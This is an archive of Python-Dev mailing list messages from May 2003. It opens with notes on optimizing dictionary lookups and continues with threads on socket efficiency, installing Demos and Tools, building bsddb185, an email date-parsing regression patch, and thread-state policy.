others).  Any one test or benchmark is likely to prove misleading.


Results of Cache Locality Experiments
-------------------------------------

When a entry is retrieved from memory, 4.333 adjacent entries are also
retrieved into a cache line.  Since accessing items in cache is *much*
cheaper than a cache miss, an enticing idea is to probe the adjacent
entries as a first step in collision resolution.  Unfortunately, the
introduction of any regularity into collision searches results in more
collisions than the current random chaining approach.

Exploiting cache locality at the expense of additional collisions fails
to payoff when the entries are already loaded in cache (the expense
is paid with no compensating benefit).  This occurs in small dictionaries
where the whole dictionary fits into a pair of cache lines.  It also
occurs frequently in large dictionaries which have a common access pattern
where some keys are accessed much more frequently than others.  The
more popular entries *and* their collision chains tend to remain in cache.

To exploit cache locality, change the collision resolution section
in lookdict() and lookdict_string().  Set i^=1 at the top of the
loop and move the  i = (i << 2) + i + perturb + 1 to an unrolled
version of the loop.

This optimization strategy can be leveraged in several ways:

* If the dictionary is kept sparse (through the tunable parameters),
then the occurrence of additional collisions is lessened.

* If lookdict() and lookdict_string() are specialized for small dicts
and for largedicts, then the versions for large_dicts can be given
the alternate search without increasing the collision in small dicts
which already have the maximum benefit of cache locality.

* If the use case for the dictionary is known to have a random key
access pattern (as opposed to a more common pattern with a Zipf's law
distribution), then there will be more benefit for large dictionaries
because any given key is no more likely than another to already be
in cache.


Optimizing the Search of Small Dictionaries
-------------------------------------------

If lookdict() and lookdict_string() are specialized for smaller dictionaries,
then a custom search approach can be implemented that exploits the small
search space and cache locality.

* The simplest example is a linear search of contiguous entries.  This is
  simple to implement, guaranteed to terminate rapidly, and precludes
  the need to check for dummy entries.

* A more advanced example is a self-organizing search so that the most
  frequently accessed entries get probed first.  The organization
  adapts if the access pattern changes over time.

* Also, small dictionaries may be made more dense, perhaps filling all
  eight cells to take the maximum advantage of two cache lines.


Strategy Pattern
----------------

Consider allowing the user to set the tunable parameters or to select a
particular search method.  Since some dictionary use cases have known
sizes and access patterns, the user may be able to provide useful hints.

1) For example, if membership testing or lookup dominates runtime and memory
   is not at a premium, the user may benefit from setting the maximum load
   ratio at 5% or 10% instead of the usual 66.7%.  This will sharply
   curtail the number of collisions.

2) Dictionary creation time can be shortened in cases where the ultimate
   size of the dictionary is known in advance.  The dictionary can be
   pre-sized so that *no* resize operations are required during creation.
   Not only does this save resizes, but the key insertion will go
   more quickly because the first half of the keys will be inserted into
   a more sparse environment than before.  The preconditions for this
   strategy arise whenever a dictionary is created from a key or item
   sequence of known length.

3) If the key space is large and the access pattern is known to be random,
   then search strategies exploiting cache locality can be fruitful.
   The preconditions for this strategy arise in simulations and
   numerical analysis.

4) If the keys are fixed and the access pattern strongly favors some of
   the keys, then the entries can be stored consecutively and accessed
   with a linear search.  This exploits knowledge of the data, cache
   locality, and a simplified search routine.  It also eliminates the
   need to test for dummy entries on each probe.  The preconditions for
   this strategy arise in symbol tables and in the builtin dictionary.



From martin@v.loewis.de  Fri May  2 07:40:21 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 02 May 2003 08:40:21 +0200
Subject: [Python-Dev] python-dev Summary for 2003-04-16 through 2003-04-30
In-Reply-To: <Pine.SOL.4.55.0305011619340.20468@death.OCF.Berkeley.EDU>
References: <Pine.SOL.4.55.0305011619340.20468@death.OCF.Berkeley.EDU>
Message-ID: <m3wuh9g8bu.fsf@mira.informatik.hu-berlin.de>

Brett Cannon <bac@OCF.Berkeley.EDU> writes:

> IDNA (International Domain Name Addressing)

Funnily, the "A" is for "in applications" (as opposed to "in the
nameserver"/"on the wire"). Explaining the acronym as
"internationalized domain names" should be sufficient.

Regards,
Martin


From Anthony Baxter <anthony@interlink.com.au>  Fri May  2 09:20:17 2003
From: Anthony Baxter <anthony@interlink.com.au> (Anthony Baxter)
Date: Fri, 02 May 2003 18:20:17 +1000
Subject: [Python-Dev] _socket efficiencies ideas
In-Reply-To: <200304091441.h39EfnU25347@odiug.zope.com>
Message-ID: <200305020820.h428KIU24126@localhost.localdomain>

>>> Guido van Rossum wrote
> Hey, I just figured it out.  The old socket module (Python 2.1 and
> before) *did* special-case \d+\.\d+\.\d+\.\d+!  This code was somehow
> lost when the IPv6 support was added.  I propose to put it back in, at
> least for IPv4 (AF_INET).  Patch anyone?

https://sourceforge.net/tracker/index.php?func=detail&aid=731209&group_id=5470&atid=305470

Unfortunately the code still goes through the idna encoding module - this
is some overhead that it would be nice to avoid for all-numeric addresses.

Anthony


From martin@v.loewis.de  Fri May  2 09:58:23 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Fri, 02 May 2003 10:58:23 +0200
Subject: [Python-Dev] _socket efficiencies ideas
In-Reply-To: <200305020820.h428KIU24126@localhost.localdomain>
References: <200305020820.h428KIU24126@localhost.localdomain>
Message-ID: <3EB2332F.70900@v.loewis.de>

Anthony Baxter wrote:
> https://sourceforge.net/tracker/index.php?func=detail&aid=731209&group_id=5470&atid=305470
> 
> Unfortunately the code still goes through the idna encoding module - this
> is some overhead that it would be nice to avoid for all-numeric addresses.

That happens only if the argument is a Unicode string, no?

Regards,
Martin



From Anthony Baxter <anthony@interlink.com.au>  Fri May  2 10:19:48 2003
From: Anthony Baxter <anthony@interlink.com.au> (Anthony Baxter)
Date: Fri, 02 May 2003 19:19:48 +1000
Subject: [Python-Dev] _socket efficiencies ideas
In-Reply-To: <3EB2332F.70900@v.loewis.de>
Message-ID: <200305020919.h429Jmp24632@localhost.localdomain>

>>> =?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?= wrote
> > Unfortunately the code still goes through the idna encoding module - this
> > is some overhead that it would be nice to avoid for all-numeric addresses.
> 
> That happens only if the argument is a Unicode string, no?

Ah. That could be the case - I think I'm loading the address from an
XML file in the test case I used... will fix that.

Anthony


From martin@v.loewis.de  Fri May  2 10:55:42 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Fri, 02 May 2003 11:55:42 +0200
Subject: [Python-Dev] _socket efficiencies ideas
In-Reply-To: <200305020919.h429Jmp24632@localhost.localdomain>
References: <200305020919.h429Jmp24632@localhost.localdomain>
Message-ID: <3EB2409E.8000403@v.loewis.de>

Anthony Baxter wrote:

> Ah. That could be the case - I think I'm loading the address from an
> XML file in the test case I used... will fix that.

If you mean "I'll fix the test case to not use XML anymore" - that
might be reasonable.

If you mean "I'll fix the test case to convert the Unicode arguments to 
byte strings before passing them to the socket module", I suggest that 
this should not be needed: the IDNA codec should complete quickly if the 
Unicode string is ASCII only (perhaps not as fast as converting the 
string to ASCII beforehand, but not significantly slower).

Regards,
Martin




From Jack.Jansen@cwi.nl  Fri May  2 13:45:34 2003
From: Jack.Jansen@cwi.nl (Jack Jansen)
Date: Fri, 2 May 2003 14:45:34 +0200
Subject: [Python-Dev] Demos and Tools in binary distributions
Message-ID: <F73C532B-7C9B-11D7-BF0A-0030655234CE@cwi.nl>

There's a suggestion over on pythonmac-sig that I add the Demos and 
Tools
directories to a binary installer for MacPython for OSX. For 
MacPython-OS9
I've always included these, as the OS9 installed tree was really the 
same
layout as the source tree. But I don't really know where I should put
them for OSX.

How is this handled in binary installers for other platforms? I.e. if
you install Python on Windows, do you get Demos and Tools? Where? And
if you install an RPM or something similar on Linux?
--
Jack Jansen, <Jack.Jansen@cwi.nl>, http://www.cwi.nl/~jack
If I can't dance I don't want to be part of your revolution -- Emma 
Goldman



From thomas@xs4all.net  Fri May  2 14:02:14 2003
From: thomas@xs4all.net (Thomas Wouters)
Date: Fri, 2 May 2003 15:02:14 +0200
Subject: [Python-Dev] Demos and Tools in binary distributions
In-Reply-To: <F73C532B-7C9B-11D7-BF0A-0030655234CE@cwi.nl>
References: <F73C532B-7C9B-11D7-BF0A-0030655234CE@cwi.nl>
Message-ID: <20030502130214.GG26254@xs4all.nl>

On Fri, May 02, 2003 at 02:45:34PM +0200, Jack Jansen wrote:

> How is this handled in binary installers for other platforms? I.e. if
> you install Python on Windows, do you get Demos and Tools? Where? And
> if you install an RPM or something similar on Linux?

The Debian packages include Demo and Tools in
/usr/share/doc/python<version>/examples/; this is practically mandated by
the Debian policy ;)

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From guido@python.org  Fri May  2 16:01:16 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 02 May 2003 11:01:16 -0400
Subject: [Python-Dev] Demos and Tools in binary distributions
In-Reply-To: "Your message of Fri, 02 May 2003 14:45:34 +0200."
 <F73C532B-7C9B-11D7-BF0A-0030655234CE@cwi.nl>
References: <F73C532B-7C9B-11D7-BF0A-0030655234CE@cwi.nl>
Message-ID: <200305021501.h42F1Ga02666@pcp02138704pcs.reston01.va.comcast.net>

> There's a suggestion over on pythonmac-sig that I add the Demos and
> Tools directories to a binary installer for MacPython for OSX. For
> MacPython-OS9 I've always included these, as the OS9 installed tree
> was really the same layout as the source tree. But I don't really
> know where I should put them for OSX.
> 
> How is this handled in binary installers for other platforms? I.e. if
> you install Python on Windows, do you get Demos and Tools? Where? And
> if you install an RPM or something similar on Linux?

On Windows, you get a small selection of tools (i18n, idle, pynche,
scripts, versioncheck and webchecker) but no demos, alas.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mwh@python.net  Fri May  2 16:03:52 2003
From: mwh@python.net (Michael Hudson)
Date: Fri, 02 May 2003 16:03:52 +0100
Subject: [Python-Dev] Demos and Tools in binary distributions
In-Reply-To: <F73C532B-7C9B-11D7-BF0A-0030655234CE@cwi.nl> (Jack Jansen's
 message of "Fri, 2 May 2003 14:45:34 +0200")
References: <F73C532B-7C9B-11D7-BF0A-0030655234CE@cwi.nl>
Message-ID: <2mof2l8k6f.fsf@starship.python.net>

Jack Jansen <Jack.Jansen@cwi.nl> writes:

> There's a suggestion over on pythonmac-sig that I add the Demos and
> Tools directories to a binary installer for MacPython for OSX. For
> MacPython-OS9 I've always included these, as the OS9 installed tree
> was really the same layout as the source tree. But I don't really
> know where I should put them for OSX.

Surely this is more a question about OSX than Python?  I.e. the
examples should go where the user expects them.
/Developer/Examples/Python?  Of course, not everyone who installs
Python will have the dev tools...

Cheers,
M.

-- 
  Need to Know is usually an interesting UK digest of things that
  happened last week or might happen next week. [...] This week,
  nothing happened, and we don't care.
                           -- NTK Now, 2000-12-29, http://www.ntk.net/


From logistix@cathoderaymission.net  Fri May  2 16:12:32 2003
From: logistix@cathoderaymission.net (logistix)
Date: Fri, 2 May 2003 10:12:32 -0500 (CDT)
Subject: [Python-Dev] Demos and Tools in binary distributions
In-Reply-To: <2mof2l8k6f.fsf@starship.python.net>
Message-ID: <Pine.LNX.4.44.0305021009460.6787-100000@oblivion.cathoderaymission.net>

On Fri, 2 May 2003, Michael Hudson wrote:

> Jack Jansen <Jack.Jansen@cwi.nl> writes:
> 
> > There's a suggestion over on pythonmac-sig that I add the Demos and
> > Tools directories to a binary installer for MacPython for OSX. For
> > MacPython-OS9 I've always included these, as the OS9 installed tree
> > was really the same layout as the source tree. But I don't really
> > know where I should put them for OSX.
> 
> Surely this is more a question about OSX than Python?  I.e. the
> examples should go where the user expects them.
> /Developer/Examples/Python?  Of course, not everyone who installs
> Python will have the dev tools...
> 
> Cheers,
> M.
> 

Are there currently any make targets for 'tools' and 'demos'? Adding them 
might be a way to gently influence where they get installed when all the 
different distros build thier packages. 



From skip@pobox.com  Fri May  2 16:30:53 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 2 May 2003 10:30:53 -0500
Subject: [Python-Dev] updated notes about building bsddb185 module
Message-ID: <16050.36653.443229.45811@montanaro.dyndns.org>

Folks,

An recent thread on c.l.py about the old bsddb module and new bsddb package
convinced me to add more verbiage about building the old version.  If you
have a moment, please take a look at

    http://www.python.org/2.3/highlights.html

and/or README at the top of the source tree.  (Search for "bsddb".)  I
modified them to include a brief note about building the bsddb185 module and
making it appear as the default when people "import bsddb".

Feedback appreciated.

Thanks,

Skip



From barry@python.org  Fri May  2 16:44:39 2003
From: barry@python.org (Barry Warsaw)
Date: 02 May 2003 11:44:39 -0400
Subject: [Python-Dev] updated notes about building bsddb185 module
In-Reply-To: <16050.36653.443229.45811@montanaro.dyndns.org>
References: <16050.36653.443229.45811@montanaro.dyndns.org>
Message-ID: <1051890279.29805.0.camel@barry>

On Fri, 2003-05-02 at 11:30, Skip Montanaro wrote:
> Folks,
> 
> An recent thread on c.l.py about the old bsddb module and new bsddb package
> convinced me to add more verbiage about building the old version.  If you
> have a moment, please take a look at
> 
>     http://www.python.org/2.3/highlights.html
> 
> and/or README at the top of the source tree.  (Search for "bsddb".)  I
> modified them to include a brief note about building the bsddb185 module and
> making it appear as the default when people "import bsddb".

Without actually trying the recipe, the instructions seem reasonable.

-Barry




From dberlin@dberlin.org  Fri May  2 16:58:03 2003
From: dberlin@dberlin.org (Daniel Berlin)
Date: Fri, 2 May 2003 11:58:03 -0400
Subject: [Python-Dev] 2.3 broke email date parsing
Message-ID: <DAFEE973-7CB6-11D7-B8AB-000A95A34564@dberlin.org>

Parsing dates in emails is broken in 2.3 compared to 2.2.2.
Changing parsedate_tz back to what it was in 2.2.2 fixes it.
I'm not sure who or why this change was made, but it clearly doesn't 
handle cases it used to:
(oldparseaddr is the 2.3 version with the patch at the bottom applied, 
which reverts it to what it was in 2.2.2)

 >>> import _parseaddr
 >>> _parseaddr.parsedate_tz("3 Mar 2001 02:04:50 -0000")
 >>> import oldparseaddr
 >>> oldparseaddr.parsedate_tz("3 Mar 2001 02:04:50 -0000")
(2001, 3, 3, 2, 4, 50, 0, 0, 0, 0)
 >>>

The problem is obvious from looking at the new code:
The old version would only care if it actually found something it 
needed to delete. The new version assumes there *must* be a comma in 
the date if there is no dayname, and if there isn't, returns nothing.

I wanted to know if this was a mistake, or done on purpose.  If it's a 
mistake, i'll submit a patch to sourceforge to fix it.

Index: _parseaddr.py
===================================================================
RCS file: /cvsroot/python/python/dist/src/Lib/email/_parseaddr.py,v
retrieving revision 1.5
diff -u -3 -p -r1.5 _parseaddr.py
--- _parseaddr.py       17 Mar 2003 18:35:42 -0000      1.5
+++ _parseaddr.py       2 May 2003 15:42:30 -0000
@@ -49,14 +49,9 @@ def parsedate_tz(data):
      data = data.split()
      # The FWS after the comma after the day-of-week is optional, so 
search and
      # adjust for this.
-    if data[0].endswith(',') or data[0].lower() in _daynames:
+    if data[0][-1] in (',', '.') or data[0].lower() in _daynames:
          # There's a dayname here. Skip it
          del data[0]
-    else:
-        i = data[0].rfind(',')
-        if i < 0:
-            return None
-        data[0] = data[0][i+1:]
      if len(data) == 3: # RFC 850 date, deprecated
          stuff = data[0].split('-')
          if len(stuff) == 3:



From just@letterror.com  Fri May  2 17:20:40 2003
From: just@letterror.com (Just van Rossum)
Date: Fri,  2 May 2003 18:20:40 +0200
Subject: [Python-Dev] Demos and Tools in binary distributions
In-Reply-To: <2mof2l8k6f.fsf@starship.python.net>
Message-ID: <r01050400-1025-1DA105BD7CBA11D7AACC003065D5E7E4@[10.0.0.23]>

Michael Hudson wrote:

> Surely this is more a question about OSX than Python?  I.e. the
> examples should go where the user expects them.
> /Developer/Examples/Python?  Of course, not everyone who installs
> Python will have the dev tools...

Actually, I didn't know until recently that 3rd party stuff sometimes
gets installed there (eg. the PyObjC doco). I would actually expect it
in /Application/MacPython-2.3/..., as that's where the apps get
installed. I guess /Developer/... would make sense if the Python apps
got installed in /Developer/Applications/, which they don't.

Just


From theller@python.net  Fri May  2 17:35:36 2003
From: theller@python.net (Thomas Heller)
Date: 02 May 2003 18:35:36 +0200
Subject: [Python-Dev] New thread death in test_bsddb3
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEIFEIAB.tim_one@email.msn.com>
References: <LNBBLJKPBEHFEDALKOLCMEIFEIAB.tim_one@email.msn.com>
Message-ID: <vfwtgvc7.fsf@python.net>

"Tim Peters" <tim_one@email.msn.com> writes:

> [Thomas Heller]
> > ...
> > So is the policy now that it is no longer *allowed* to create another
> > thread state, while in previous versions there wasn't any choice,
> > because there existed no way to get the existing one?
> 
> You can still create all the thread states you like; the new check is in
> PyThreadState_Swap(), not in PyThreadState_New().
So you can create them, but are not allowed to use them? (Should there
be a smiley here, or not, I'm not sure)

> 
> There was always a choice, but previously Python provided no *help* in
> keeping track of whether a thread already had a thread state associated with
> it.  That didn't stop careful apps from providing their own mechanisms to do
> so.
> 
> About policy, yes, it appears to be so now, else Mark wouldn't be raising a
> fatal error <wink>.  I view it as having always been the policy (from a
> good-faith reading of the previous code), just a policy that was too
> expensive for Python to enforce.  There are many policies like that, such as
> not passing goofy arguments to macros, and not letting references leak.
> Python doesn't currently enforce them because it's currently too expensive
> to enforce them.  Over time that can change.

I'm confused: what *is* the policy now?
And: Has the policy *changed*, or was it simply not checked before?

Since I don't know the policy, I can only guess if the fatal error is
appropriate or not.

If it is, there should be a 'recipe' what to do (even if it is 'use the
approach outlined in PEP311').

If it is not, the error should be removed (IMO).

> Clearly, I like having fatal errors for dubious things in debug builds.
> Debug builds are supposed to help you debug.  If the fatal error here drives
> you insane, and you don't want to repair the app code,

No, not at all.

Thanks,

Thomas



From martin@v.loewis.de  Fri May  2 18:01:51 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Fri, 02 May 2003 19:01:51 +0200
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building bsddb185 module
In-Reply-To: <16050.36653.443229.45811@montanaro.dyndns.org>
References: <16050.36653.443229.45811@montanaro.dyndns.org>
Message-ID: <3EB2A47F.8000706@v.loewis.de>

Skip Montanaro wrote:

> Feedback appreciated.

I think we need to build bsddb185 automatically under certain
conditions. I have encouraged a user to submit a patch in that
direction.

Regards,
Martin




From skip@pobox.com  Fri May  2 18:34:40 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 2 May 2003 12:34:40 -0500
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building bsddb185
 module
In-Reply-To: <3EB2A47F.8000706@v.loewis.de>
References: <16050.36653.443229.45811@montanaro.dyndns.org>
 <3EB2A47F.8000706@v.loewis.de>
Message-ID: <16050.44080.588636.503705@montanaro.dyndns.org>

    Martin> Skip Montanaro wrote:
    >> Feedback appreciated.

    Martin> I think we need to build bsddb185 automatically under certain
    Martin> conditions. I have encouraged a user to submit a patch in that
    Martin> direction.

I suppose that's an alternative, however, it is complicated by a couple
issues:

    * The bsddb185 module would have to be built as bsddb (not a big deal in
      and of itself).

    * The current bsddb package directory would have to be renamed or not
      installed to avoid name clashes.

I don't think there's a precedent for the second issue.  The make install
target installs everything in Lib.  I think The decision about whether the
package or the module gets installed would be made in setup.py.  The
coupling between the two increases the complexity of the process.  I smell
an ugly hack in the offing.

Skip


From tim.one@comcast.net  Fri May  2 18:55:05 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 02 May 2003 13:55:05 -0400
Subject: [Python-Dev] New thread death in test_bsddb3
In-Reply-To: <vfwtgvc7.fsf@python.net>
Message-ID: <BIEJKCLHCIOIHAGOKOLHKENKFIAA.tim.one@comcast.net>

[Thomas Heller]
>>> ...
>>> So is the policy now that it is no longer *allowed* to create another
>>> thread state, while in previous versions there wasn't any choice,
>>> because there existed no way to get the existing one?

[Tim]
>> You can still create all the thread states you like; the new check is
>> in PyThreadState_Swap(), not in PyThreadState_New().

[Thomas]
> So you can create them,

Yes.

> but are not allowed to use them?

Currently, no more than one at a time per thread.  The API doesn't appear to
preclude using multiple thread states with a single thread if the right
dances are performed.  Offhand I don't know why someone would want to, but
people want to do a lot of silly things <wink>.

> (Should there be a smiley here, or not, I'm not sure)

No.

> ...
> I'm confused: what *is* the policy now?
> And: Has the policy *changed*, or was it simply not checked before?

I already gave you my best guesses about those (no, yes).

> Since I don't know the policy, I can only guess if the fatal error is
> appropriate or not.

Ditto (yes).

> If it is, there should be a 'recipe' what to do (even if it is 'use the
> approach outlined in PEP311').

Additions to NEWS and the PEP would be fine by me.

> If it is not, the error should be removed (IMO).

Sure.



From tim.one@comcast.net  Fri May  2 20:28:41 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 02 May 2003 15:28:41 -0400
Subject: [Python-Dev] Draft of dictnotes.txt  [Please Comment]
In-Reply-To: <000901c3106b$0d549d20$125ffea9@oemcomputer>
Message-ID: <BIEJKCLHCIOIHAGOKOLHGEOEFIAA.tim.one@comcast.net>

[Raymond Hettinger]

> NOTES ON OPTIMIZING DICTIONARIES
> ================================
> ...

Very nice!  Please check it in.


From tim.one@comcast.net  Fri May  2 20:59:40 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 02 May 2003 15:59:40 -0400
Subject: [Python-Dev] python-dev Summary for 2003-04-16 through 2003-04-30
In-Reply-To: <Pine.SOL.4.55.0305011619340.20468@death.OCF.Berkeley.EDU>
Message-ID: <BIEJKCLHCIOIHAGOKOLHGEOJFIAA.tim.one@comcast.net>

[Brett Cannon]
> ...
> But the function still got added for numbers.  So, as of Python 2.3b1,
> there is a built-in named 'sum' that has the parameter list
> "sum(list_of_numbers [, start=0]) -> sum of the numbers in
> list_of_numbers".  The 'start' parameter allows you to specify where to
> start in the list for your running sum.

list_of_numbers is really any iterable producing numbers.

All the numbers are added ("start" doesn't affect that), as if via

def sum(seq, start=0):
    result = start
    for x in seq:
        result += x
    return start

The best use for start is if you're summing a sequence of number-like
arguments that can't be added to the integer 0 (datetime.timedelta is an
example).

> ...
> Python, the gift that keeps on giving you more responsibility.  =)

Speaking of which, your PSF dues for April are overdue <wink>.

> ...
> `os.path.walk() lacks 'depth first' option`__
>     Someone requested that os.path.walk support depth-first walking.

This was a terminology confusion:  os.path.walk() always did depth-first
walking, and so does the new os.walk().  The missing bit was an option to
control whether directories are delivered in preorder ("top down") or
postorder ("bottom up") during the depth-first walk.

> The request was deemed not important enough to bother implementing,

A topdown flag is implemented in os.walk().



From Jack.Jansen@oratrix.com  Fri May  2 22:52:08 2003
From: Jack.Jansen@oratrix.com (Jack Jansen)
Date: Fri, 2 May 2003 23:52:08 +0200
Subject: [Python-Dev] Demos and Tools in binary distributions
In-Reply-To: <r01050400-1025-1DA105BD7CBA11D7AACC003065D5E7E4@[10.0.0.23]>
Message-ID: <51F6BD90-7CE8-11D7-A7DC-000A27B19B96@oratrix.com>

On vrijdag, mei 2, 2003, at 18:20 Europe/Amsterdam, Just van Rossum 
wrote:

> Michael Hudson wrote:
>
>> Surely this is more a question about OSX than Python?  I.e. the
>> examples should go where the user expects them.
>> /Developer/Examples/Python?  Of course, not everyone who installs
>> Python will have the dev tools...
>
> Actually, I didn't know until recently that 3rd party stuff sometimes
> gets installed there (eg. the PyObjC doco). I would actually expect it
> in /Application/MacPython-2.3/..., as that's where the apps get
> installed. I guess /Developer/... would make sense if the Python apps
> got installed in /Developer/Applications/, which they don't.

I'm also tempted to go with /Applications/MacPython-2.3/Demo and 
.../Tools.
That is what a lot of Mac applications do. It has a slight problems, 
though:
it would look unintuitive to a pure-unix user. But as there isn't a
standard location for this on unix anyway: who cares <wink>.

A slightly more serious problem is that the README's in Tools and Demo 
aren't
really meant for the 100%-novice, and a prominent location at the top 
of the
/Applications/MacPython-2.3 folder will make it almost-100%-certain that
these files are going to be among the first they read.

I could put Demo and Tools one level deeper (in an Extras folder?) and
provide a readme there explaining that these demos and tools are for all
Pythons on all platforms, so may not work and/or may not be intellegible
int he first place.
--
- Jack Jansen        <Jack.Jansen@oratrix.com>        
http://www.cwi.nl/~jack -
- If I can't dance I don't want to be part of your revolution -- Emma 
Goldman -



From just@letterror.com  Fri May  2 23:08:48 2003
From: just@letterror.com (Just van Rossum)
Date: Sat,  3 May 2003 00:08:48 +0200
Subject: [Python-Dev] Demos and Tools in binary distributions
In-Reply-To: <51F6BD90-7CE8-11D7-A7DC-000A27B19B96@oratrix.com>
Message-ID: <r01050400-1025-A7D6FBB87CEA11D7AF4B003065D5E7E4@[10.0.0.23]>

Jack Jansen wrote:

> I could put Demo and Tools one level deeper (in an Extras folder?)
> and provide a readme there explaining that these demos and tools are
> for all Pythons on all platforms, so may not work and/or may not be
> intellegible int he first place.

+1

Just


From martin@v.loewis.de  Sat May  3 00:39:51 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Sat, 03 May 2003 01:39:51 +0200
Subject: [Python-Dev] New thread death in test_bsddb3
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHKENKFIAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHKENKFIAA.tim.one@comcast.net>
Message-ID: <3EB301C7.5000508@v.loewis.de>

Tim Peters wrote:

> Currently, no more than one at a time per thread.  The API doesn't appear to
> preclude using multiple thread states with a single thread if the right
> dances are performed.  Offhand I don't know why someone would want to, but
> people want to do a lot of silly things <wink>.

There are many good reasons; here is one scenario:

Application A calls embedded Python. It creates thread state T1 to do 
so. Python calls library L1, which releases GIL. L1 calls L2. L2 calls
back into Python. To do so, it allocates a new thread state, and 
acquires the GIL. All in one thread.

L2 has no idea that A has already allocated a thread state for this 
thread. With the new API, L2 does not need any longer to create a thread 
state. However, in older Python releases, this was necessary, so 
libraries do such things. It is unfortunate that these libraries now 
break, and I wish the new API would not be enforced so strictly yet.

> I already gave you my best guesses about those (no, yes).

I think your guess is wrong: In the past, it was often *necessary* to 
have multiple thread states allocated for a single thread. There was 
simply no other option. So it can't be that this was not allowed.

Regards,
Martin




From skip@pobox.com  Sat May  3 00:49:31 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 2 May 2003 18:49:31 -0500
Subject: [Python-Dev] removing csv directory from nondist/sandbox - how?
Message-ID: <16051.1035.821998.148196@montanaro.dyndns.org>

Taking a cue from Raymond's sandbox/itertools cleanup, I cvs removed the
contents of sandbox/csv just now.  How do I get rid of the sandbox/csv
directory itself?  I see that the itertools directory remains as well, even
though I executed "cvs -dP ." from the sandbox directory.

Skip


From martin@v.loewis.de  Sat May  3 00:32:24 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Sat, 03 May 2003 01:32:24 +0200
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building bsddb185
 module
In-Reply-To: <16050.44080.588636.503705@montanaro.dyndns.org>
References: <16050.36653.443229.45811@montanaro.dyndns.org>        <3EB2A47F.8000706@v.loewis.de> <16050.44080.588636.503705@montanaro.dyndns.org>
Message-ID: <3EB30008.4010603@v.loewis.de>

Skip Montanaro wrote:

[building bsddb185]
> I suppose that's an alternative, however, it is complicated by a couple
> issues:
> 
>     * The bsddb185 module would have to be built as bsddb (not a big deal in
>       and of itself).

Why is that? I propose to build the bsddb185 module as bsddb185. It does 
not support being built as bsddb[module].

>     * The current bsddb package directory would have to be renamed or not
>       installed to avoid name clashes.

I suggest no such thing, and I agree that this would not be desirable.

Regards,
Martin




From skip@pobox.com  Sat May  3 01:11:53 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 2 May 2003 19:11:53 -0500
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building bsddb185
 module
In-Reply-To: <3EB30008.4010603@v.loewis.de>
References: <16050.36653.443229.45811@montanaro.dyndns.org>
 <3EB2A47F.8000706@v.loewis.de>
 <16050.44080.588636.503705@montanaro.dyndns.org>
 <3EB30008.4010603@v.loewis.de>
Message-ID: <16051.2377.270099.748537@montanaro.dyndns.org>

    Skip> I suppose that's an alternative, however, it is complicated by a
    Skip> couple issues:
    Skip> 
    Skip> * The bsddb185 module would have to be built as bsddb (not a big
    Skip>   deal in and of itself).

    Martin> Why is that? I propose to build the bsddb185 module as
    Martin> bsddb185. It does not support being built as bsddb[module].

    Skip> * The current bsddb package directory would have to be renamed or
    Skip>   not installed to avoid name clashes.

    Martin> I suggest no such thing, and I agree that this would not be
    Martin> desirable.

My apologies, Martin.  I guess I misunderstood what you suggested.  (I
suspect Nick Vargish may have as well.)  My interpretation of his complaint
is that he doesn't have a functioning bsddb module and wants the old module
back.  He wants to be able to install Python and have "bsddb" be the module.
As currently constituted, I think Modules/bsddbmodule.c can only be built as
"bsddb185" because of the symbols in the file.  How can Nick build that as
"bsddb"?  Furthermore, how can you guarantee that the bsddb package
directory won't be found before the bsddb module during a module search
(short, perhaps of statically linking the module into the interpreter)?

Skip



From pje@telecommunity.com  Sat May  3 01:29:12 2003
From: pje@telecommunity.com (Phillip J. Eby)
Date: Fri, 02 May 2003 20:29:12 -0400
Subject: [Python-Dev] removing csv directory from nondist/sandbox -
 how?
In-Reply-To: <16051.1035.821998.148196@montanaro.dyndns.org>
Message-ID: <5.1.0.14.0.20030502202821.02563020@mail.telecommunity.com>

At 06:49 PM 5/2/03 -0500, Skip Montanaro wrote:
>Taking a cue from Raymond's sandbox/itertools cleanup, I cvs removed the
>contents of sandbox/csv just now.  How do I get rid of the sandbox/csv
>directory itself?  I see that the itertools directory remains as well, even
>though I executed "cvs -dP ." from the sandbox directory.

You can't remove directories from a CVS server unless you have direct 
access to it.  And if you remove the directory, its history goes with it.




From martin@v.loewis.de  Sat May  3 01:25:03 2003
From: martin@v.loewis.de (=?ISO-8859-1?Q?=22Martin_v=2E_L=F6wis=22?=)
Date: Sat, 03 May 2003 02:25:03 +0200
Subject: [Python-Dev] Re: [Pydotorg] updated notes about building bsddb185
 module
In-Reply-To: <16051.2377.270099.748537@montanaro.dyndns.org>
References: <16050.36653.443229.45811@montanaro.dyndns.org>        <3EB2A47F.8000706@v.loewis.de>        <16050.44080.588636.503705@montanaro.dyndns.org>        <3EB30008.4010603@v.loewis.de> <16051.2377.270099.748537@montanaro.dyndns.org>
Message-ID: <3EB30C5F.90801@v.loewis.de>

Skip Montanaro wrote:

> My apologies, Martin.  I guess I misunderstood what you suggested.  (I
